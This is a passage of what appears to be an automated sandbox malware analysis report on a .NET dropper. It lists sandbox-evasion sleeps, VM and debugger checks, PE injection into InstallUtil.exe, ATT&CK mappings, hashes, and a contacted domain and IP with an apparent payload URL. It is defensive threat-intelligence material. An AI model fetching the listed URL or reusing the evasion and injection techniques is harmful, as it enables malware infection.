                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 4796Thread sleep time: -99016s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 4796Thread sleep time: -98860s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 4796Thread sleep time: -98735s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 4796Thread sleep time: -98519s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 4796Thread sleep time: -98360s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 4796Thread sleep time: -98204s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 4796Thread sleep time: -98079s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 4796Thread sleep time: -97954s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 4796Thread sleep time: -97829s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 4796Thread sleep time: -97719s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 4796Thread sleep time: -97594s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 4796Thread sleep time: -97485s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 4796Thread sleep time: -97360s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 4796Thread sleep time: -97235s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 4796Thread sleep time: -97110s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 4796Thread sleep time: -96985s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exe TID: 4796Thread sleep time: -96860s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 100000Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 99875Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 99766Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 99641Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 99516Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 99406Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 99295Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 99143Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 99016Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 98860Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 98735Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 98519Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 98360Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 98204Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 98079Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 97954Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 97829Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 97719Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 97594Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 97485Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 97360Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 97235Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 97110Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 96985Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeThread delayed: delay time: 96860Jump to behavior
                Source: TiOWA908TP.exe, 00000000.00000002.2457094539.00000000032CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
                Source: TiOWA908TP.exe, 00000000.00000002.2456307775.0000000001452000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllE
                Source: TiOWA908TP.exe, 00000000.00000002.2457094539.00000000032CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\TiOWA908TP.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 700000 value starts with: 4D5AJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\TiOWA908TP.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 700000Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 702000Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 75C000Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 75E000Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 4AD008Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeQueries volume information: C:\Users\user\Desktop\TiOWA908TP.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\TiOWA908TP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		211
                Process Injection                		1
                Disable or Modify Tools                		OS Credential Dumping1
                Query Registry                		Remote Services1
                Archive Collected Data                		11
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		LSASS Memory111
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media1
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)211
                Process Injection                		Security Account Manager1
                Process Discovery                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                Obfuscated Files or Information                		NTDS41
                Virtualization/Sandbox Evasion                		Distributed Component Object ModelInput Capture13
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading                		LSA Secrets1
                Application Window Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                TiOWA908TP.exe19%VirustotalBrowse
                TiOWA908TP.exe100%AviraTR/Dropper.Gen
                TiOWA908TP.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://cud-senegal.org/post-postlogin/Gjflop.mp30%Avira URL Cloudsafe
                https://cud-senegal.org0%Avira URL Cloudsafe
                https://cud-senegal.org/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                cud-senegal.org
                		51.159.14.89
                		truefalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://cud-senegal.org/post-postlogin/Gjflop.mp3false
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://github.com/mgravell/protobuf-netTiOWA908TP.exe, 00000000.00000002.2472292603.0000000004301000.00000004.00000800.00020000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.2483106844.0000000007130000.00000004.08000000.00040000.00000000.sdmpfalse
                    		high
                    https://github.com/mgravell/protobuf-netiTiOWA908TP.exe, 00000000.00000002.2472292603.0000000004301000.00000004.00000800.00020000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.2483106844.0000000007130000.00000004.08000000.00040000.00000000.sdmpfalse
                      		high
                      https://stackoverflow.com/q/14436606/23354TiOWA908TP.exe, 00000000.00000002.2472292603.0000000004301000.00000004.00000800.00020000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.2457094539.00000000032CC000.00000004.00000800.00020000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.2483106844.0000000007130000.00000004.08000000.00040000.00000000.sdmpfalse
                        		high
                        https://github.com/mgravell/protobuf-netJTiOWA908TP.exe, 00000000.00000002.2472292603.0000000004301000.00000004.00000800.00020000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.2483106844.0000000007130000.00000004.08000000.00040000.00000000.sdmpfalse
                          		high
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameTiOWA908TP.exe, 00000000.00000002.2457094539.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://cud-senegal.org/TiOWA908TP.exe, 00000000.00000002.2456307775.00000000014A3000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://cud-senegal.orgTiOWA908TP.exe, 00000000.00000002.2457094539.0000000003281000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://stackoverflow.com/q/11564914/23354;TiOWA908TP.exe, 00000000.00000002.2472292603.0000000004301000.00000004.00000800.00020000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.2483106844.0000000007130000.00000004.08000000.00040000.00000000.sdmpfalse
                              		high
                              https://stackoverflow.com/q/2152978/23354TiOWA908TP.exe, 00000000.00000002.2472292603.0000000004301000.00000004.00000800.00020000.00000000.sdmp, TiOWA908TP.exe, 00000000.00000002.2483106844.0000000007130000.00000004.08000000.00040000.00000000.sdmpfalse
                                		high

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                51.159.14.89
                                		cud-senegal.orgFrance
                                		12876OnlineSASFRfalse

                                General Information

                                Joe Sandbox version:42.0.0 Malachite
                                Analysis ID:1590837
                                Start date and time:2025-01-14 15:02:33 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 6m 22s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Run name:Potential for more IOCs and behavior
                                Number of analysed new started processes analysed:8
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:TiOWA908TP.exe
                                renamed because original name is a hash value
                                Original Sample Name:f1bbcbcf580673f86692045f0e6c1141.exe
                                Detection:MAL
                                Classification:mal88.evad.winEXE@4/0@1/1
                                EGA Information:
                                • Successful, ratio: 50%
                                HCA Information:
                                • Successful, ratio: 92%
                                • Number of executed functions: 326
                                • Number of non-executed functions: 42
                                Cookbook Comments:
                                • Found application associated with file extension: .exe

                                Warnings

                                • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                • Excluded IPs from analysis (whitelisted): 13.107.253.45, 20.12.23.50
                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Execution Graph export aborted for target InstallUtil.exe, PID 6660 because it is empty
                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                09:03:41API Interceptor25x Sleep call for process: TiOWA908TP.exe modified

                                Joe Sandbox View / Context

                                IPs

                                No context

                                Domains

                                No context

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                OnlineSASFRhttp://aeromorning.comGet hashmaliciousUnknownBrowse
                                • 212.129.3.113
                                12E56QE1Fc.exeGet hashmaliciousAzorultBrowse
                                • 51.15.142.235
                                4.elfGet hashmaliciousUnknownBrowse
                                • 51.158.21.37
                                miori.sh4.elfGet hashmaliciousUnknownBrowse
                                • 212.129.5.22
                                https://antiphishing.vadesecure.com/v4?f=bnJjU3hQT3pQSmNQZVE3aOMl-Yxz6sxP-_mvIRuY-wdnZ1bXTFIOIwMxyCDi0KedKx4XzS44_P2zUeNIsKUb0ScW6k1yl1_sQ4IsBBcClSw_vWV34HFG0fKKBNYTYHpo&i=SGI0YVJGNmxZNE90Z2thMHUqf298Dc88cJEXrW3w1lA&k=dFBm&r=SW5LV3JodE9QZkRVZ3JEYa6kbR5XAzhHFJ0zbTQRADrRG7ugnfE15pwrEQUVhgv3E2tVXwBw8NfFSkf3wOZ0VA&s=ecaab139c1f3315ccc0d88a6451dccec431e8ce1d856e71e5109e33657c13a3c&u=https%3A%2F%2Fsender5.zohoinsights-crm.com%2Fck1%2F2d6f.327230a%2F5f929700-cca4-11ef-973d-525400f92481%2F4cb2ae4047e7a38310b2b2641663917c123a5dec%2F2%3Fe%3DGKxHQ%252FSSm8D%252B%252B3g8VEcICaLHKdekhRU94ImygZ37tRI%253DGet hashmaliciousUnknownBrowse
                                • 163.172.240.109
                                Mes_Drivers_3.0.4.exeGet hashmaliciousUnknownBrowse
                                • 212.129.3.113
                                Mes_Drivers_3.0.4.exeGet hashmaliciousUnknownBrowse
                                • 212.129.3.112
                                hiwA7Blv7C.exeGet hashmaliciousXmrigBrowse
                                • 51.15.58.224
                                8p5iD52knN.exeGet hashmaliciousAzorultBrowse
                                • 51.15.241.168

                                JA3 Fingerprints

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                3b5074b1b5d032e5620f69f9f700ff0e50201668.exeGet hashmaliciousMassLogger RATBrowse
                                • 51.159.14.89
                                TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                • 51.159.14.89
                                VRO.exeGet hashmaliciousUnknownBrowse
                                • 51.159.14.89
                                mP8rzGD7fG.dllGet hashmaliciousUnknownBrowse
                                • 51.159.14.89
                                VRO.exeGet hashmaliciousUnknownBrowse
                                • 51.159.14.89
                                mP8rzGD7fG.dllGet hashmaliciousUnknownBrowse
                                • 51.159.14.89
                                iTVsz8WAu4.exeGet hashmaliciousUnknownBrowse
                                • 51.159.14.89
                                HLi4q5WAh3.exeGet hashmaliciousUnknownBrowse
                                • 51.159.14.89
                                e0691gXIKs.exeGet hashmaliciousUnknownBrowse
                                • 51.159.14.89
                                hJ1bl8p7dJ.exeGet hashmaliciousUnknownBrowse
                                • 51.159.14.89

                                Dropped Files

                                No context

                                Created / dropped Files

                                No created / dropped files found

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Entropy (8bit):0.014109040332189342
                                TrID:
                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                • Generic Win/DOS Executable (2004/3) 0.01%
                                • DOS Executable Generic (2002/1) 0.01%
                                File name:TiOWA908TP.exe
                                File size:104'857'600 bytes
                                MD5:f1bbcbcf580673f86692045f0e6c1141
                                SHA1:14b1bb7f931dad06ca86e7d1921a3dd09153fa49
                                SHA256:019e924a0b82a0c448cb283cb72b47ad019ecc4de05fddbd41c983f704271c03
                                SHA512:29e89a172b5ec38ccef22af821ef5b92d049d4dfb59751a77f6a6f1843343f199b3372e3a59bb795699c219c10721bcdd1671284657de11332c62cc0febb8fe9
                                SSDEEP:1536:EA3d8vNhDwPJrB5I+IYcUUvs1R82opTiKZ6VQI:EAt8vNwrDI+sUK226/
                                TLSH:4A381A81F35403B1F9AA0B3CA8A78A124B3A7DBB8D45FB4D184D72510F77792852375A
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....J.g................................. ........@.. ....................................`................................

                                File Icon

                                Icon Hash:3819386387c91919

                                Static PE Info

                                General

                                Entrypoint:0x40a59e
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                Time Stamp:0x67864A11 [Tue Jan 14 11:27:13 2025 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:v4.0.30319
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                Entrypoint Preview

                                Instruction
                                jmp dword ptr [00402000h]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0xa5540x4a.text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x11ad2.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x1e0000xc.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x20000x85a40x8600b83b373dcedc444eaba999355bc881e1False0.48347131529850745data5.635715646525423IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rsrc0xc0000x11ad20x11c007e5c1e0a79afa2908d4b3c0e881f4bf7False0.21762213908450703data2.6460935023941827IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc0x1e0000xc0x2008c6ae808a6b411a0a0bf99753758292bFalse0.044921875data0.07763316234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                Resources

                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                RT_ICON0xc06c0x114b8Device independent bitmap graphic, 114 x 300 x 32, image size 68400, resolution 3779 x 3779 px/m0.21019198193111235
                                RT_GROUP_ICON0x1d5600x14data1.15
                                RT_VERSION0x1d5b00x2fcdata0.43848167539267013
                                RT_MANIFEST0x1d8e80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                Imports

                                DLLImport
                                mscoree.dll_CorExeMain

                                Network Behavior

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Jan 14, 2025 15:03:42.964617968 CET49704443192.168.2.551.159.14.89
                                Jan 14, 2025 15:03:42.964689970 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:42.964767933 CET49704443192.168.2.551.159.14.89
                                Jan 14, 2025 15:03:43.024276972 CET49704443192.168.2.551.159.14.89
                                Jan 14, 2025 15:03:43.024315119 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:43.740835905 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:43.740986109 CET49704443192.168.2.551.159.14.89
                                Jan 14, 2025 15:03:43.819885015 CET49704443192.168.2.551.159.14.89
                                Jan 14, 2025 15:03:43.819912910 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:43.820303917 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:43.874890089 CET49704443192.168.2.551.159.14.89
                                Jan 14, 2025 15:03:44.210663080 CET49704443192.168.2.551.159.14.89
                                Jan 14, 2025 15:03:44.251373053 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:44.521150112 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:44.521177053 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:44.521187067 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:44.521210909 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:44.521234989 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:44.521239996 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:44.521250010 CET49704443192.168.2.551.159.14.89
                                Jan 14, 2025 15:03:44.521294117 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:44.521306992 CET49704443192.168.2.551.159.14.89
                                Jan 14, 2025 15:03:44.521337032 CET49704443192.168.2.551.159.14.89
                                Jan 14, 2025 15:03:44.530536890 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:44.530558109 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:44.530637026 CET49704443192.168.2.551.159.14.89
                                Jan 14, 2025 15:03:44.530657053 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:44.578042030 CET49704443192.168.2.551.159.14.89
                                Jan 14, 2025 15:03:44.614748001 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:44.614763975 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:44.614814997 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:44.614845037 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:44.614929914 CET49704443192.168.2.551.159.14.89
                                Jan 14, 2025 15:03:44.614953041 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:44.614974976 CET49704443192.168.2.551.159.14.89
                                Jan 14, 2025 15:03:44.614995003 CET49704443192.168.2.551.159.14.89
                                Jan 14, 2025 15:03:44.623025894 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:44.623044014 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:44.623184919 CET49704443192.168.2.551.159.14.89
                                Jan 14, 2025 15:03:44.623207092 CET4434970451.159.14.89192.168.2.5
                                Jan 14, 2025 15:03:44.623249054 CET49704443192.168.2.551.159.14.89
